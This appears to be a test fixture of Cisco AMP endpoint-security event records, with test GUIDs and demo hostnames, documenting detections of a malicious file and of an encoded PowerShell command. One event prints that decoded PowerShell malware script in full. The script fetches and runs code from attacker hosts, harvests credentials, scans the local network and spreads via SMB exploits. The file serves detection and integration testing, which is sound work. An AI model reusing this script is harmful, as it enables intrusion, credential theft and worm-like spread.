+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":713000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336646","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336647","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"kepv86368.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336646","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"uqlq0o884.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336645","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"120C.tmp","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\120C.tmp","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":183000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336644","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"92673dd0e5f4a094fa6cd57bb301f884f2289f6c","md5":"2f99e3456dc1d26f77c52b2119fde92f"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":810000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"WMIPRVSE Launched Encoded Powershell 
Command","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[{"action":"end_process","end_ts":1602033881808,"params":["10724"],"start_ts":1602033881805,"status":"success"}],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","$ s e = @ ( ' u p d a t e . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' i n f o . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' 8 7 . 1 2 1 . 9 8 . 2 1 5 ' )  
 $ n i c = ' w w w . w i n d o w s d e f e n d e r h o s t . c l u b '  
 f o r e a c h ( $ t   i n   $ s e )  
 {  
         $ p i n = t e s t - c o n n e c t i o n   $ t  
         i f   ( $ p i n   - n e   $ n u l l )  
         {  
                 $ n i c = $ t  
                 b r e a k  
         }  
 }  
 $ n i c = $ n i c + " : 8 0 0 0 "  
 $ v e r = ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / v e r . t x t " ) . T r i m ( )    
 i f ( $ v e r   - n e   $ n u l l ) {    
         i f ( $ v e r   - n e   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' v e r ' ] . V a l u e ) {    
                 I E X   ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / i n f o 6 . p s 1 " )  
                 r e t u r n    
         }    
 }  
 $ s t i m e = [ E n v i r o n m e n t ] : : T i c k C o u n t  
 $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e                  
 $ d e f u n = [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ f u n s ) )  
 i e x   $ d e f u n  
  
 G e t - W m i O b j e c t   _ _ F i l t e r T o C o n s u m e r B i n d i n g   - N a m e s p a c e   r o o t \ s u b s c r i p t i o n   |   W h e r e - O b j e c t   { $ _ . f i l t e r   - n o t m a t c h   ' S y s t e m   E v e n t s   L o g ' }   | R e m o v e - W m i O b j e c t  
 $ d i r p a t h = $ e n v : S y s t e m R o o t + ' \ s y s t e m 3 2 '        
 i f     ( ! ( t e s t - p a t h   $ d i r p a t h   ) ) {  
 	 $ d i r p a t h = $ e n v : S y s t e m R o o t  
 }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' ) ) )  
  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' )   ' v c p ' }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' ) ) )  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' )   ' v c r ' }  
  
 [ a r r a y ] $ p s i d s =   g e t - p r o c e s s   - n a m e   p o w e r s h e l l   | s o r t   c p u   - D e s c e n d i n g |   F o r E a c h - O b j e c t   { $ _ . i d }  
 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 $ e x i s t = $ F a l s e  
 i f   ( $ p s i d s   - n e   $ n u l l   )  
 {  
         f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( $ l i n e   - e q   $ n u l l )  
                 { c o n t i n u e }  
                 i f   ( ( $ p s i d s [ 0 ]   - e q   $ l i n e [ - 1 ] )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ t . c o n t a i n s ( " : 8 0   " )   - o r   $ t . c o n t a i n s ( " : 1 4 4 4 4 " ) )   )  
                 {  
                         $ e x i s t = $ t r u e  
                         b r e a k  
                 }  
         }  
 }  
 K i l l B o t ( ' c o r e d p u s s v r ' )  
 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
                 i f   ( ( $ l i n e [ - 3 ]   - n e   $ n u l l )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 1 1 1 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 2 2 2 2 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 3 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 4 4 4 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 5 5 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 6 6 6 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 7 7 7 7 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 8 8 8 8 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 9 9 9 9 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 4 4 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 5 5 6 0 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 5 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 3 3 5 " ) ) )  
                 {  
                         $ e v i d = $ l i n e [ - 1 ]  
                         G e t - P r o c e s s   - i d   $ e v i d   |   s t o p - p r o c e s s   - f o r c e  
                 }  
         }  
 i f   ( ! $ e x i s t   - a n d   ( $ p s i d s . c o u n t   - l e   8 ) )  
 {        
         $ c m d m o n = " p o w e r s h e l l   - N o P   - N o n I   - W   H i d d e n   ` " ` $ m o n   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m o n ' ] . V a l u e ; ` $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e   ; i e x   ( [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( ` $ f u n s ) ) ) ; I n v o k e - C o m m a n d     - S c r i p t B l o c k   ` $ R e m o t e S c r i p t B l o c k   - A r g u m e n t L i s t   @ ( ` $ m o n ,   ` $ m o n ,   ' V o i d ' ,   0 ,   ' ' ,   ' ' ) ` " "  
         $ v b s   =   N e w - O b j e c t   - C o m O b j e c t   W S c r i p t . S h e l l  
 	 $ v b s . r u n ( $ c m d m o n , 0 )      
 }  
  
 $ N T L M = $ F a l s e  
 $ m i m i   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m i m i ' ] . V a l u e    
 $ a ,   $ N T L M =   G e t - c r e d s   $ m i m i   $ m i m i  
                
 $ N e t w o r k s   =   G e t - W m i O b j e c t   W i n 3 2 _ N e t w o r k A d a p t e r C o n f i g u r a t i o n   - E A   S t o p   |   ?   { $ _ . I P E n a b l e d }          
 $ i p s u   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i p s u ' ] . V a l u e    
 $ i 1 7   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i 1 7 ' ] . V a l u e  
 $ s c b a =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' s c ' ] . V a l u e  
 [ b y t e [ ] ] $ s c = [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ s c b a )            
 f o r e a c h   ( $ N e t w o r k   i n   $ N e t w o r k s )    
 {                          
          
         $ I P A d d r e s s     =   $ N e t w o r k . I p A d d r e s s [ 0 ]      
 	 i f   ( $ I P A d d r e s s   - m a t c h   ' ^ 1 6 9 . 2 5 4 ' ) { c o n t i n u e }   	  
         $ S u b n e t M a s k     =   $ N e t w o r k . I P S u b n e t [ 0 ]      
         $ i p s = G e t - N e t w o r k R a n g e   $ I P A d d r e s s   $ S u b n e t M a s k  
 	 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 	 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
 	 	 i f   ( $ l i n e . c o u n t   - l e   4 ) { c o n t i n u e }  
 	 	 $ i = $ l i n e [ - 3 ] . s p l i t ( ' : ' ) [ 0 ]  
                 i f   (   ( $ l i n e [ - 2 ]   - e q   ' E S T A B L I S H E D ' )   - a n d     ( $ i   - n e   ' 1 2 7 . 0 . 0 . 1 ' )   - a n d   ( $ i p s   - n o t c o n t a i n s   $ i ) )  
                 {  
                         $ i p s + = $ i  
                 }  
         }  
         i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
         f o r e a c h   ( $ i p   i n   $ i p s )  
         {        
                 i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
                 i f   ( $ i p   - e q   $ I P A d d r e s s ) { c o n t i n u e }            
                 i f   ( ( T e s t - C o n n e c t i o n   $ i p   - c o u n t   1 )   - n e   $ n u l l     - a n d   $ i p s u   - n o t c o n t a i n s   $ i p )    
                 {        
                         $ r e = 0  
                         i f   ( $ a . c o u n t   - n e   0 )              
                         { $ r e   =   t e s t - i p   - i p   $ i p   - c r e d s   $ a     - n i c   $ n i c   - n t l m   $ N T L M   }  
                         i f   ( $ r e   - e q   1 ) { $ i p s u   = $ i p s u   + "   " + $ i p }  
 	 	 	 e l s e  
 	 	 	 {  
 	 	 	 	 $ v u l = [ P i n g C a s t l e . S c a n n e r s . m 1 7 s c ] : : S c a n ( $ i p ) 	 	 	 	  
 	 	 	 	 i f   ( $ v u l   - a n d   $ i 1 7   - n o t c o n t a i n s   $ i p )  
  
 	 	 	 	 {  
 	 	 	 	 	 $ r e s = e b 7   $ i p   $ s c  
 	 	 	 	 	 i f   ( ! ( $ r e s   - e q   $ t r u e ) )  
 	 	 	 	 	 { e b 8   $ i p   $ s c }  
 	 	 	 	 	 $ i 1 7   =   $ i 1 7   +   "   " + $ i p  
 	 	 	 	 }  
 	 	 	 }  
                 }  
         }  
   }                
 $ S t a t i c C l a s s = N e w - O b j e c t   M a n a g e m e n t . M a n a g e m e n t C l a s s ( ' r o o t \ d e f a u l t : c o r e d p u s s v r ' )      
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i p s u '   , $ i p s u )  
 $ S t a t i c C l a s s . P u t ( )  
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i 1 7 '   , $ i 1 7 )  
 $ S t a t i c C l a s s . P u t ( ) "],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E $ s e = @ ( ' u p d a t e . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' i n f o . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' 8 7 . 1 2 1 . 9 8 . 2 1 5 ' )  
 $ n i c = ' w w w . w i n d o w s d e f e n d e r h o s t . c l u b '  
 f o r e a c h ( $ t   i n   $ s e )  
 {  
         $ p i n = t e s t - c o n n e c t i o n   $ t  
         i f   ( $ p i n   - n e   $ n u l l )  
         {  
                 $ n i c = $ t  
                 b r e a k  
         }  
 }  
 $ n i c = $ n i c + " : 8 0 0 0 "  
 $ v e r = ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / v e r . t x t " ) . T r i m ( )    
 i f ( $ v e r   - n e   $ n u l l ) {    
         i f ( $ v e r   - n e   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' v e r ' ] . V a l u e ) {    
                 I E X   ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / i n f o 6 . p s 1 " )  
                 r e t u r n    
         }    
 }  
 $ s t i m e = [ E n v i r o n m e n t ] : : T i c k C o u n t  
 $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e                  
 $ d e f u n = [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ f u n s ) )  
 i e x   $ d e f u n  
  
 G e t - W m i O b j e c t   _ _ F i l t e r T o C o n s u m e r B i n d i n g   - N a m e s p a c e   r o o t \ s u b s c r i p t i o n   |   W h e r e - O b j e c t   { $ _ . f i l t e r   - n o t m a t c h   ' S y s t e m   E v e n t s   L o g ' }   | R e m o v e - W m i O b j e c t  
 $ d i r p a t h = $ e n v : S y s t e m R o o t + ' \ s y s t e m 3 2 '        
 i f     ( ! ( t e s t - p a t h   $ d i r p a t h   ) ) {  
 	 $ d i r p a t h = $ e n v : S y s t e m R o o t  
 }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' ) ) )  
  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' )   ' v c p ' }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' ) ) )  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' )   ' v c r ' }  
  
 [ a r r a y ] $ p s i d s =   g e t - p r o c e s s   - n a m e   p o w e r s h e l l   | s o r t   c p u   - D e s c e n d i n g |   F o r E a c h - O b j e c t   { $ _ . i d }  
 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 $ e x i s t = $ F a l s e  
 i f   ( $ p s i d s   - n e   $ n u l l   )  
 {  
         f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( $ l i n e   - e q   $ n u l l )  
                 { c o n t i n u e }  
                 i f   ( ( $ p s i d s [ 0 ]   - e q   $ l i n e [ - 1 ] )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ t . c o n t a i n s ( " : 8 0   " )   - o r   $ t . c o n t a i n s ( " : 1 4 4 4 4 " ) )   )  
                 {  
                         $ e x i s t = $ t r u e  
                         b r e a k  
                 }  
         }  
 }  
 K i l l B o t ( ' c o r e d p u s s v r ' )  
 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
                 i f   ( ( $ l i n e [ - 3 ]   - n e   $ n u l l )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 1 1 1 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 2 2 2 2 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 3 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 4 4 4 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 5 5 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 6 6 6 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 7 7 7 7 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 8 8 8 8 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 9 9 9 9 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 4 4 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 5 5 6 0 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 5 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 3 3 5 " ) ) )  
                 {  
                         $ e v i d = $ l i n e [ - 1 ]  
                         G e t - P r o c e s s   - i d   $ e v i d   |   s t o p - p r o c e s s   - f o r c e  
                 }  
         }  
 i f   ( ! $ e x i s t   - a n d   ( $ p s i d s . c o u n t   - l e   8 ) )  
 {        
         $ c m d m o n = " p o w e r s h e l l   - N o P   - N o n I   - W   H i d d e n   ` " ` $ m o n   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m o n ' ] . V a l u e ; ` $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e   ; i e x   ( [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( ` $ f u n s ) ) ) ; I n v o k e - C o m m a n d     - S c r i p t B l o c k   ` $ R e m o t e S c r i p t B l o c k   - A r g u m e n t L i s t   @ ( ` $ m o n ,   ` $ m o n ,   ' V o i d ' ,   0 ,   ' ' ,   ' ' ) ` " "  
         $ v b s   =   N e w - O b j e c t   - C o m O b j e c t   W S c r i p t . S h e l l  
 	 $ v b s . r u n ( $ c m d m o n , 0 )      
 }  
  
 $ N T L M = $ F a l s e  
 $ m i m i   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m i m i ' ] . V a l u e    
 $ a ,   $ N T L M =   G e t - c r e d s   $ m i m i   $ m i m i  
                
 $ N e t w o r k s   =   G e t - W m i O b j e c t   W i n 3 2 _ N e t w o r k A d a p t e r C o n f i g u r a t i o n   - E A   S t o p   |   ?   { $ _ . I P E n a b l e d }          
 $ i p s u   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i p s u ' ] . V a l u e    
 $ i 1 7   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i 1 7 ' ] . V a l u e  
 $ s c b a =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' s c ' ] . V a l u e  
 [ b y t e [ ] ] $ s c = [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ s c b a )            
 f o r e a c h   ( $ N e t w o r k   i n   $ N e t w o r k s )    
 {                          
          
         $ I P A d d r e s s     =   $ N e t w o r k . I p A d d r e s s [ 0 ]      
 	 i f   ( $ I P A d d r e s s   - m a t c h   ' ^ 1 6 9 . 2 5 4 ' ) { c o n t i n u e }   	  
         $ S u b n e t M a s k     =   $ N e t w o r k . I P S u b n e t [ 0 ]      
         $ i p s = G e t - N e t w o r k R a n g e   $ I P A d d r e s s   $ S u b n e t M a s k  
 	 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 	 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
 	 	 i f   ( $ l i n e . c o u n t   - l e   4 ) { c o n t i n u e }  
 	 	 $ i = $ l i n e [ - 3 ] . s p l i t ( ' : ' ) [ 0 ]  
                 i f   (   ( $ l i n e [ - 2 ]   - e q   ' E S T A B L I S H E D ' )   - a n d     ( $ i   - n e   ' 1 2 7 . 0 . 0 . 1 ' )   - a n d   ( $ i p s   - n o t c o n t a i n s   $ i ) )  
                 {  
                         $ i p s + = $ i  
                 }  
         }  
         i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
         f o r e a c h   ( $ i p   i n   $ i p s )  
         {        
                 i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
                 i f   ( $ i p   - e q   $ I P A d d r e s s ) { c o n t i n u e }            
                 i f   ( ( T e s t - C o n n e c t i o n   $ i p   - c o u n t   1 )   - n e   $ n u l l     - a n d   $ i p s u   - n o t c o n t a i n s   $ i p )    
                 {        
                         $ r e = 0  
                         i f   ( $ a . c o u n t   - n e   0 )              
                         { $ r e   =   t e s t - i p   - i p   $ i p   - c r e d s   $ a     - n i c   $ n i c   - n t l m   $ N T L M   }  
                         i f   ( $ r e   - e q   1 ) { $ i p s u   = $ i p s u   + "   " + $ i p }  
 	 	 	 e l s e  
 	 	 	 {  
 	 	 	 	 $ v u l = [ P i n g C a s t l e . S c a n n e r s . m 1 7 s c ] : : S c a n ( $ i p ) 	 	 	 	  
 	 	 	 	 i f   ( $ v u l   - a n d   $ i 1 7   - n o t c o n t a i n s   $ i p )  
  
 	 	 	 	 {  
 	 	 	 	 	 $ r e s = e b 7   $ i p   $ s c  
 	 	 	 	 	 i f   ( ! ( $ r e s   - e q   $ t r u e ) )  
 	 	 	 	 	 { e b 8   $ i p   $ s c }  
 	 	 	 	 	 $ i 1 7   =   $ i 1 7   +   "   " + $ i p  
 	 	 	 	 }  
 	 	 	 }  
                 }  
         }  
   }                
 $ S t a t i c C l a s s = N e w - O b j e c t   M a n a g e m e n t . M a n a g e m e n t C l a s s ( ' r o o t \ d e f a u l t : c o r e d p u s s v r ' )      
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i p s u '   , $ i p s u )  
 $ S t a t i c C l a s s . P u t ( )  
